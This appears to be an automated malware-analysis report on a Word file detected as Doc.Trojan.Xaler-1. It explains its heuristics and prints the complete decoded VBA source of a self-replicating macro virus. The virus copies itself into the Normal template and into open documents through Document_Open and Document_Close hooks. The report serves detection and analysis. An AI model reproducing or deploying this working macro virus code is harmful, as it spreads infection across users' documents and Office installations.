MALICIOUS
148
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The critical heuristic 'VBA macro-virus self-replication / AV tampering' indicates the macro attempts to write its own code into the Normal template and the active document. The script explicitly attempts to export the current document's VBA project to 'C:\temp.tmp' and then insert modified code back into the Normal template and active document, suggesting a self-replication or persistence mechanism. The ClamAV detection 'Doc.Trojan.Xaler-1' further supports a malicious classification.
Heuristics 3
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATIONVBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.Matched line in script
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2728 bytes |
SHA-256: d9fa91d9adf33fa850ab121b80f03279068da9d318adfdfaf84c54a47cac3166 |
|||
|
Detection
ClamAV:
Doc.Trojan.Xaler-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
'RELAX
Private Sub RELAX2()
End
End Sub
Private Sub ComboBox1_Change()
End Sub
Private Sub CheckBox2_Click()
End Sub
Private Sub CheckBox1_Click()
End Sub
Private Sub CheckBox11_Click()
End Sub
Private Sub CheckBox113_Click()
End Sub
Private Sub CheckBox12_Click()
End Sub
Private Sub CheckBox121_Click()
End Sub
Private Sub CheckBox15_Click()
End Sub
Private Sub Document_Close()
Call GOODSub
Call RELAX2
End Sub
Private Sub GOODSub()
On Error Resume Next
Application.ScreenUpdating = False
Application.Options.SaveNormalPrompt = False
x$ = "C:\temp.tmp"
MacroContainer.VBProject.vbcomponents.Item("ThisDocument").Export x$
Open x$ For Input As #1
keimeno = Input(LOF(1), 1)
Close #1
kk& = InStr(1, keimeno, "'RELAX")
keimeno = Right$(keimeno, Len(keimeno) - kk& + 1)
For j = 1 To 2
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").Export x$
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").Export x$
End If
Open x$ For Input As #1
rlx = Input(LOF(1), 1)
Close #1
d1 = InStr(1, rlx, "'RELAX")
If d1 = 0 Then
If j = 1 Then
NormalTemplate.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
NormalTemplate.Save
Else
ActiveDocument.VBProject.vbcomponents.Item("ThisDocument").CodeModule.InsertLines 1, keimeno
End If
End If
Next j
'====================
Dim PRostasia As Byte
PRostasia = 1
fff = FreeFile
If Dir(ActiveDocument.FullName, 6) <> "" Then
Open ActiveDocument.FullName For Binary As #fff
Put #fff, 862, PRostasia
Close #fff
ActiveDocument.Save
End If
Kill x$
Application.ScreenUpdating = True
End Sub
Private Sub Document_Open()
Call GOODSub
End Sub
Private Sub CheckBox1221_Click()
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.